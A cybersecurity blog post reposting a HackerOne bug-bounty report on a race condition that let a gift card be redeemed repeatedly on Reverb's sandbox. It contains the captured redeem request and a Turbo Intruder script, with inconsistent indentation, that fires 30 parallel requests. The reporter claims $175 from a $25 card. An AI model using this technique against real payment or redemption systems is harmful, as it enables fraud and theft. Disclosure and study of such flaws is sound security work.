Davinder Tutorials

This blog is all about Cyber Security and IT

Race Condition Bug

While Reading about Race Condition , I found an interesting report on hackerone . Below is a report submitted by Juho Myllys (muon4)

========================

Hello team!

I've found a Race Condition vulnerability which allows to redeem gift cards multiple times. This how a s/he can easily buy stuff just buying one gift card and redeem it over and over again.

Steps to reproduce

Preparations

  • Burp Suite Pro
  • Turbo Intruder

Note: This also can be reproduced other way but this is maybe the easiest

The attack

  • Login
  • Buy a gift card
  • Now redeem it at https://sandbox.reverb.com/<lang>/redeem
  • Intercept the request which will be following:
POST /fi/redeem HTTP/1.1
Host: sandbox.reverb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sandbox.reverb.com/fi/redeem
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Connection: keep-alive
Cookie: <cookies>

utf8=%E2%9C%93&authenticity_token=<CSRF token>&token=<GIFT card>&commit=Redeem+Now
  • Send it to the turbo intruder
  • Use this python code as a payload of the turbo intruder
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=30,
                           pipeline=False
                           )

   for i in range(30):
    engine.queue(target.req, i)
        engine.queue(target.req, target.baseInput, gate='race1')


    engine.start(timeout=5)
   engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
  • Now set the external HTTP header x-request: %s - This is needed by the turbo intruder
  • Click "Attack"
  • See multiple 200 OK responses:

  • Check your Reverb bucks and see that you have a way more money than the gift card actually was worth of:

In my case I bought one gift card which was worth of 25$ and as we can see from the picture I was able to redeem it 7 times which makes 25*7 = 175$.

If you need any information please let me know.

Cheers!

Impact

Race Condition can be used for get almost free stuff and steal money.

0 comments:

Post a Comment

Subscribe to: Posts (Atom)